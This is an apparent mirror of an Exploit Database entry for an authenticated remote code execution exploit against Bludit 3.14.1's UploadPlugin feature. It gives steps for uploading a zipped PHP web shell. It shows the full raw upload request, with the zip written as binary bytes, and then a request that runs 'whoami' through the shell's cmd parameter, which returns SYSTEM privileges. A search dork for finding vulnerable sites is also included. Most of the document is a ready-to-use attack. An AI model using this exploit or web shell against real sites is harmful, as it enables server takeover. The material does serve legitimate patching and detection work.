Bludit 3-14-1 Plugin ‘UploadPlugin’ – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 20 阅读

• 作者： Alperen Ergel
  日期： 2023-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51160/

• # Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
  # Exploit Author: Alperen Ergel
  # Contact: @alpernae (IG/TW)
  # Software Homepage: https://www.bludit.com/
  # Version : 3-14-1
  # Tested on: windows 11 wampserver | Kali linux
  # Category: WebApp
  # Google Dork: intext:'2022 Powered by Bludit'
  # Date: 8.12.2022
  ######## Description ########
  #
  #Step 1 : Archive as a zip your webshell (example: payload.zip)
  #Step 2 : Login admin account and download 'UploadPlugin'
  #Step 3 : Go to UploadPlugin section
  #Step 4 : Upload your zip
  #Step 5 : target/bl-plugins/[your_payload]
  #
  ######## Proof of Concept ########
  
  
  ==============> START REQUEST <========================================
  
  POST /admin/plugin/uploadplugin HTTP/2
  Host: localhost
  Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
  Content-Length: 1820
  Origin: https://036e-88-235-222-210.eu.ngrok.io
  Dnt: 1
  Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Te: trailers
  
  -----------------------------308003478615795926433430552264
  Content-Disposition: form-data; name="tokenCSRF"
  
  b6487f985b68f2ac2c2d79b4428dda44696d6231
  -----------------------------308003478615795926433430552264
  Content-Disposition: form-data; name="pluginorthemes"
  
  plugins
  -----------------------------308003478615795926433430552264
  Content-Disposition: form-data; name="zip_file"; filename="a.zip"
  Content-Type: application/zip
  
  PK†eˆU a/PK ”fˆUÆ	ª)¢Ä
  a/a.phpíVێÓ0}ç+La BÛìVܖpX®ËJ @V꺭!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/. pÝãZ+M5/•¶BÎÈ0>©M†[jłÓB,„õtO̤Ҝ.
  ×4;’†e)¨ƒ¼Èה¯9[Z¡dðÆ	„Œ&Âd
  <ó`÷+œN—’y¼Á
  RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“
  j±u
  \õ„±†à/ï¾Îޞ´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%
  µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚
  hBz0;f rì‰þǸ0yÕU¥H"ÕÕÿI	IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç	Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.
  îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï
  e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷
  kC57j©'Î"m
   ã®ho¹ xŸô Û;’œcçzÙQ
  Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ	ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~–eãΙåØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~t6á¾,…ÅèçO´ÇÆ×Σv²±ãÿbÑڒ‘Ug[;pq
  ›eÓÜÅØÿéJ
  Ë}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK
  ?†eˆU $ €íAa/
   
   þš®,
  Ù
   þš®,
  Ù
  €ø¨j.
  Ù
  PK
  ? ”fˆUÆ	ª)¢Ä
  $€¤a/a.php
   
   ¤eÝ-
  Ù
   ÷C-
  Ù
   bj.
  Ù
  PK  ­ ç
  -----------------------------308003478615795926433430552264
  Content-Disposition: form-data; name="submit"
  
  Upload
  -----------------------------308003478615795926433430552264--
  
  
  ==============> END REQUEST <========================================
  
  ## WEB SHELL UPLOADED!
  
  ==============> START RESPONSE <========================================
  
  HTTP/2 200 OK
  Cache-Control: no-store, no-cache, must-revalidate
  Content-Type: text/html; charset=UTF-8
  Date: Thu, 08 Dec 2022 18:01:43 GMT
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
  Pragma: no-cache
  Server: Apache/2.4.51 (Win64) PHP/7.4.26
  X-Powered-By: Bludit
  .
  .
  .
  .
  
  ==============> END RESPONSE <========================================
  
  # REQUEST THE WEB SHELL
  
  ==============> START REQUEST <========================================
  
  GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
  Host: localhost
  Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Dnt: 1
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: none
  Sec-Fetch-User: ?1
  Te: trailers
  
  ==============> END REQUEST <========================================
  
  ==============> START RESPONSE <========================================
  
  HTTP/2 200 OK
  Content-Type: text/html; charset=UTF-8
  Date: Thu, 08 Dec 2022 18:13:14 GMT
  Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
  Server: Apache/2.4.51 (Win64) PHP/7.4.26
  X-Powered-By: PHP/7.4.26
  Content-Length: 32
  
  <pre>nt authority\system
  </pre>
  
  ==============> END RESPONSE <========================================